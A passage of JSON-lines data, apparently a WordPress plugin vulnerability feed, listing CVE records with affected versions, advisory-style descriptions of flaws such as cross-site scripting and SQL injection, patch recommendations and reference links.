version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.3\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L1122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.3\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L1122\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.2\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L1122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.2\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L1122\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.3\\\/includes\\\/functions\\\/wcj-functions-general.php#L1205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.3\\\/includes\\\/functions\\\/wcj-functions-general.php#L1205\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0257620-3a0e-4011-9378-7aa423e7c0b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0257620-3a0e-4011-9378-7aa423e7c0b2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4711","slug":"ajax-load-more","versionImpact":"7.1.1","versionEndExcluding":"7.1.2","description":"The WordPress Infinite Scroll \u2013 Ajax Load More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ajax_load_more shortcode in versions up to, and including, 7.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e86c080d-202c-4c41-b9cc-c35249aabba5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e86c080d-202c-4c41-b9cc-c35249aabba5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/trunk\\\/core\\\/classes\\\/class-alm-shortcode.php#L1191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/trunk\\\/core\\\/classes\\\/class-alm-shortcode.php#L1191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/trunk\\\/build\\\/frontend\\\/ajax-load-more.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/trunk\\\/build\\\/frontend\\\/ajax-load-more.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095200%40ajax-load-more&new=3095200%40ajax-load-more&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095200%40ajax-load-more&new=3095200%40ajax-load-more&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3548","slug":"shortcodes-ultimate","versionImpact":"7.1.0","versionEndExcluding":"7.1.2","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate WordPress plugin before 7.1.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 7.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9eef8b29-2c62-4daa-ae90-467ff9be18d8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9eef8b29-2c62-4daa-ae90-467ff9be18d8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12594","slug":"login-page-styler","versionImpact":"7.1.1","versionEndExcluding":"7.1.2","description":"The Custom Login Page Styler \u2013 Login Protected Private Site , Change wp-admin login url , WordPress login logo , Temporary admin login access , Rename login , Login customizer, Hide wp-login \u2013 Limit Login Attempts \u2013 Locked Site plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the 'lps_generate_temp_access_url' AJAX action in all versions up to, and including, 7.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to login as other users such as subscribers.","recommendation":"Update to version 7.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208192%40login-page-styler&new=3208192%40login-page-styler&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208192%40login-page-styler&new=3208192%40login-page-styler&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e50c519-7d79-4270-92e8-75e54bb08cff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e50c519-7d79-4270-92e8-75e54bb08cff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13530","slug":"login-page-styler","versionImpact":"7.1.1","versionEndExcluding":"7.1.2","description":"The Custom Login Page Styler \u2013 Limit Login Attempts \u2013 Restrict Content With Login \u2013 Redirect After Login \u2013 Change Login URL \u2013 Sign in , Sign out plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the lps_handle_delete_all_logs(), lps_handle_delete_login_log(), and lps_handle_end_session() functions in all versions up to, and including, 7.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete login logs and end user sessions.","recommendation":"Update to version 7.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-page-styler\\\/tags\\\/7.1.2\\\/loginPageStylerLogSettings.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-page-styler\\\/tags\\\/7.1.2\\\/loginPageStylerLogSettings.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-page-styler\\\/tags\\\/7.1.2\\\/loginPageStylerLogSettings.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-page-styler\\\/tags\\\/7.1.2\\\/loginPageStylerLogSettings.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232237%40login-page-styler&new=3232237%40login-page-styler&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232237%40login-page-styler&new=3232237%40login-page-styler&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-page-styler\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-page-styler\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a143d611-9e22-49d1-9a9f-12f1c45685c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a143d611-9e22-49d1-9a9f-12f1c45685c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4542","slug":"shortcodes-ultimate","versionImpact":"7.1.0","versionEndExcluding":"7.1.2","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_lightbox shortcode in all versions up to, and including, 7.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71564eec-426a-46fa-b614-388bebae6ebd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71564eec-426a-46fa-b614-388bebae6ebd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069892%40shortcodes-ultimate%2Ftrunk&old=3064679%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069892%40shortcodes-ultimate%2Ftrunk&old=3064679%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9eef8b29-2c62-4daa-ae90-467ff9be18d8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9eef8b29-2c62-4daa-ae90-467ff9be18d8\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-3548\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-3548\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10472","slug":"stylish-price-list","versionImpact":"7.1.11","versionEndExcluding":"7.1.12","description":"The Stylish Price List  WordPress plugin before 7.1.12 does not sanitise and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 7.1.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d79e5c05-26d0-4223-891f-42ac9fb6ef6e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d79e5c05-26d0-4223-891f-42ac9fb6ef6e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6288","slug":"enhanced-e-commerce-for-woocommerce-store","versionImpact":"7.1.0","versionEndExcluding":"7.1.1","description":"The Conversios \u2013 Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018tiktok_user_id\u2019 parameter in all versions up to, and including, 7.0.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 7.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f668c3cd-bf64-4e95-8d75-70e4f12cabce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f668c3cd-bf64-4e95-8d75-70e4f12cabce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/tags\\\/7.1.0\\\/admin\\\/partials\\\/wizard-productfeed-even.php?rev=3105213#L371\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/tags\\\/7.1.0\\\/admin\\\/partials\\\/wizard-productfeed-even.php?rev=3105213#L371\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/tags\\\/7.1.0\\\/admin\\\/partials\\\/wizard-productfeed-odd.php?rev=3105213#L368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/tags\\\/7.1.0\\\/admin\\\/partials\\\/wizard-productfeed-odd.php?rev=3105213#L368\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108037\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108037\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3302","slug":"xagio-seo","versionImpact":"7.1.0.16","versionEndExcluding":"7.1.0.17","description":"The Xagio SEO \u2013 AI Powered SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018HTTP_REFERER\u2019 parameter in all versions up to, and including, 7.1.0.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 7.1.0.0.","recommendation":"Update to version 7.1.0.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xagio-seo\\\/tags\\\/7.0.0.34\\\/modules\\\/redirects\\\/models\\\/xagio_log404.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xagio-seo\\\/tags\\\/7.0.0.34\\\/modules\\\/redirects\\\/models\\\/xagio_log404.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xagio-seo\\\/tags\\\/7.0.0.34\\\/modules\\\/redirects\\\/models\\\/xagio_log404.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xagio-seo\\\/tags\\\/7.0.0.34\\\/modules\\\/redirects\\\/models\\\/xagio_log404.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xagio-seo\\\/tags\\\/7.0.0.34\\\/modules\\\/redirects\\\/redirects.js#L554\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xagio-seo\\\/tags\\\/7.0.0.34\\\/modules\\\/redirects\\\/redirects.js#L554\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xagio-seo\\\/tags\\\/7.0.0.34\\\/modules\\\/redirects\\\/redirects.js#L662\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xagio-seo\\\/tags\\\/7.0.0.34\\\/modules\\\/redirects\\\/redirects.js#L662\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281174\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281174\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305780\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305780\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/xagio-seo\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/xagio-seo\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e2afd66-c896-47c8-bf56-84a086087d55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e2afd66-c896-47c8-bf56-84a086087d55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/xagio.com\\\/redirects\\\/\",\"name\":\"https:\\\/\\\/xagio.com\\\/redirects\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4021","slug":"modern-events-calendar-lite","versionEndExcluding":"7.1.0","description":"The Modern Events Calendar lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Google API key and Calendar ID in versions up to, but not including, 7.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 7.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f213fb42-5bab-4017-80ea-ce6543031af2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f213fb42-5bab-4017-80ea-ce6543031af2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/webnus.net\\\/modern-events-calendar\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/webnus.net\\\/modern-events-calendar\\\/change-log\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0263","slug":"wp-yelp-review-slider","versionEndExcluding":"7.1","description":"The WP Yelp Review Slider WordPress plugin before 7.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b4a6459-3e49-4048-8a9f-d7bb350aa2f6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b4a6459-3e49-4048-8a9f-d7bb350aa2f6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12035","slug":"cs-framework","versionImpact":"7.0","versionEndExcluding":"7.1","description":"The CS Framework plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the cs_widget_file_delete() function in all versions up to, and including, 6.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31093664-c45e-4e87-b72f-5cdf8e8e9f67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31093664-c45e-4e87-b72f-5cdf8e8e9f67?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13440","slug":"superstorefinder-wp","versionImpact":"7.0","versionEndExcluding":"7.1","description":"The Super Store Finder plugin for WordPress is vulnerable to SQL Injection via the \u2018ssf_wp_user_name\u2019 parameter in all versions up to, and including, 7.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into an already existing query to store cross-site scripting in store reviews.","recommendation":"Update to version 7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/superstorefinder.net\\\/support\\\/forums\\\/topic\\\/super-store-finder-for-wordpress-patch-notes\\\/\",\"name\":\"https:\\\/\\\/superstorefinder.net\\\/support\\\/forums\\\/topic\\\/super-store-finder-for-wordpress-patch-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc468bfd-b9a2-4fe6-b896-d738c767146a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc468bfd-b9a2-4fe6-b896-d738c767146a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10046","slug":"persian-woocommerce-sms","versionImpact":"7.0.5","versionEndExcluding":"7.0.6","description":"The ?????? ????? ??????? Persian WooCommerce SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 7.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/persian-woocommerce-sms\\\/tags\\\/7.0.3\\\/src\\\/SMS\\\/Archive.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/persian-woocommerce-sms\\\/tags\\\/7.0.3\\\/src\\\/SMS\\\/Archive.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201912\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201912\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175a69da-c47a-40f3-98c7-7cfcdf98f9f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175a69da-c47a-40f3-98c7-7cfcdf98f9f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9213","slug":"persian-woocommerce-sms","versionImpact":"7.0.2","versionEndExcluding":"7.0.3","description":"The ?????? ????? ??????? Persian WooCommerce SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 7.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8845d56-2e8a-472a-bc32-e26b388ce58d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8845d56-2e8a-472a-bc32-e26b388ce58d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/persian-woocommerce-sms\\\/tags\\\/7.0.2\\\/src\\\/Subscribe\\\/Contacts.php#L527\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/persian-woocommerce-sms\\\/tags\\\/7.0.2\\\/src\\\/Subscribe\\\/Contacts.php#L527\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/persian-woocommerce-sms\\\/tags\\\/7.0.2\\\/src\\\/Subscribe\\\/Contacts.php#L290\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/persian-woocommerce-sms\\\/tags\\\/7.0.2\\\/src\\\/Subscribe\\\/Contacts.php#L290\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/persian-woocommerce-sms\\\/tags\\\/7.0.2\\\/src\\\/Subscribe\\\/Contacts.php#L412\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/persian-woocommerce-sms\\\/tags\\\/7.0.2\\\/src\\\/Subscribe\\\/Contacts.php#L412\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170258\\\/persian-woocommerce-sms\\\/trunk\\\/src\\\/Subscribe\\\/Contacts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170258\\\/persian-woocommerce-sms\\\/trunk\\\/src\\\/Subscribe\\\/Contacts.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8016","slug":"events-calendar-pro","versionImpact":"7.0.2","versionEndExcluding":"7.0.2.1","description":"The Events Calendar Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 7.0.2 via deserialization of untrusted input from the 'filters' parameter in widgets. This makes it possible for authenticated attackers, with administrator-level access and above, to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely. In certain configurations, this can be exploitable by lower level users. We confirmed that this plugin installed with Elementor makes it possible for users with contributor-level access and above to exploit this issue.","recommendation":"Update to version 7.0.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34f0e5a6-0bd3-4734-b7e0-27dc825d193f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34f0e5a6-0bd3-4734-b7e0-27dc825d193f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/theeventscalendar.com\\\/release-notes\\\/events-calendar-pro\\\/events-calendar-pro-7-0-2-1\\\/\",\"name\":\"https:\\\/\\\/theeventscalendar.com\\\/release-notes\\\/events-calendar-pro\\\/events-calendar-pro-7-0-2-1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/theeventscalendar.com\\\/blog\\\/news\\\/important-security-update-for-the-events-calendar-pro\\\/\",\"name\":\"https:\\\/\\\/theeventscalendar.com\\\/blog\\\/news\\\/important-security-update-for-the-events-calendar-pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0792","slug":"shortcodes-ultimate","versionEndExcluding":"7.0.2","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.0.1 due to insufficient input sanitization and output escaping on RSS feed content. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/feed.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/feed.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/feed.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/feed.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026377\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026377\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6488","slug":"shortcodes-ultimate","versionImpact":"7.0.0","versionEndExcluding":"7.0.1","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_button', 'su_members', and 'su_tabs' shortcodes in all versions up to, and including, 7.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.0.1, or a newer patched 